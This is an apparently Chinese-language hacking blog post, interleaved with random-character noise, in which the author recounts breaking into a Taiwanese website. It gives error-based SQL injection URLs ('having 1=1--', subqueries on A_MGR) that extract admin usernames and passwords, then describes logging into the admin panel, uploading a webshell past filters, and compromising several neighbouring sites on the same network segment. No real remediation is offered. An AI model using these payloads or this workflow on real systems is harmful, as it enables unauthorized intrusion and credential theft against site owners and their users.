发现一个注入点0 d: J2 M& u; Z1 b6 S; \
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
, l8 G1 B; ?; R T5 ]+ J7 e+ b& s1 `% Q
习惯性的加’having1=1--
2 S3 e9 H- o1 p+ P1 o8 j9 i: i- S, M! H" s" i( ?
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
' C' l, o$ r1 X2 l* f; `4 k1 C" j& x; N. ?/ R, ^& a
0/ Q; h3 i1 ?- y2 A) J& Y: g$ j
9 l3 P2 Y/ e& W N) |. o爆出Diary_A.dl_Title(这时候很激动啊)5 V6 k3 t- Y& t. b8 |# P3 a
& a: e D% J8 L( V$ o& Y
那么继续3 t( H2 }$ H* e4 e f% V# Q8 D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
3 H: W* g& W7 }1 v) A5 u; p; o0 J* F( ~: R0 X) T- \% q0 G
继续,一直爆下去" }% ], W4 g+ n" e4 A1 L7 R3 `
" q3 W4 [/ E. |* r
爆到几个字段和表段 但是没找到需要的管理用户的字段
0 _' v/ a2 t9 \
0 Q# w/ ~, e V) l蛋疼了 怎么办 然后去后台登陆页看源码; N" ~4 M, d0 b8 g
1 A+ ?8 n+ h8 B/ u6 v; S5 c
03 A ^2 {, ?( ~/ e9 o+ p
( W; Y. B$ [1 X) W7 _% }9 g
Input name= “ADUID”
/ o- Y7 F) s8 _/ f: cInput name= “ADPWD”
) t5 h+ p; P& R7 P
+ o" S: i8 G/ Q7 D% g很幸运 找到了字段那就继续4 P' i+ X& L- ?/ W7 x
找到之后开始爆用户
1 s0 v- a a3 \# Z. q4 X( Ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—" Z1 A( _* L7 s6 `4 A/ G) M
爆密码 ?' g/ ]4 Q/ ~8 r8 v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—" t& G/ L+ H+ t
测试了下 这个注入点只能爆到文章哪里的表 ' j9 K# E( g* E4 h4 c
4 h: q0 E7 u; Z' l
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了1 h3 c+ o" c! t5 b- B6 h$ z
+ b! u7 o+ N: H" F( }5 H4 |又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
0 i+ x2 J' f) }# c7 }5 y, Y" |: o' A( a# |1 k& [9 j
473
6 n; p/ g6 M5 \, x1 M& ]0 n6 Z# z6 f S4 Q
进后台
9 Q- l5 ~# v6 z
?2 B: l) H7 n U T2 O
7 K" O$ c9 r- Y: v发现几个上传点 有的地方不能上传 而且防止恶意代码: _2 s! I; b3 W+ u
4 u! X( x; I1 @- \/ x: N C没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 j8 m5 W$ d! c. T M4 k! M# V6 w# b3 G# p: o8 l3 d
5 L: w N1 Y" o* _+ q9 k
在系统管理那里直接上传 不过没有显示地址+ O0 l' o4 I0 l D4 |8 S
, {/ A- j2 |7 T/ a再上传一次 抓包 搞定OK" t% j3 x- `8 O" b: ]( H2 [9 B
+ c6 N8 e2 s/ J9 M; X# D& G4 x2 e4 o1 U D
7 u2 }' `' g9 D0 k3 T7 i
& @1 x, t/ m% d/ a8 K472& g7 x" Z) t8 I+ s6 O5 ~) k n& T& V( |
- d [6 b: Y: t2 S. L- v晚上不行了 去睡觉。。。3 l1 i; @" H; p5 u) {+ t
第二天刚起床 闲的没事做继续日站吧 - e5 x2 ?9 R: Z' G" n" L& b
C3 N3 a( g, i* k0 @
找个站 就把这个站的旁c扫了下
$ Y, [6 l/ l( O# B2 I3 \) A+ A
5 p2 e5 W- y7 U发现c段也有一个购物站 ,然后还和这个站的模板差不多
& v! }& [! m7 O, f1 T% N
4 n- o- Y- U5 Z1 _6 Q4 t9 ?1 c就找到会员登录口测试# o+ b* Z; C4 Z( {8 ?) y
! L4 H4 L; W. T'and (select top 1 MGR_UID from A_MGR)>0—( A0 R+ Y4 n; Z% v% h# ^
果断爆到了 这时候我很激动 通杀" ]% v6 Z% @* Z- ] y
; S0 l& U+ j; A F: l+ E, }
再次翻c段; A- }4 W- D, L% u% W6 i
3 X8 k3 W7 ~: |* y翻出几个站 都成功拿下) T; Z- X* t- `# W6 D) f' g
) F. H3 j, Z; R
2 D( t; q; w$ b3 F$ j3 L6 T i
+ [. D2 @' x' _
修复方案:
8 e. u; x' p; V. w他们比我专业
$ G5 x D& H k; i% s4 c. A, ~. G
. ~' j- k2 O$ K, C* E; k" c7 V8 l0 e- I- d- D
2 g$ E* s% w& N' b4 {
|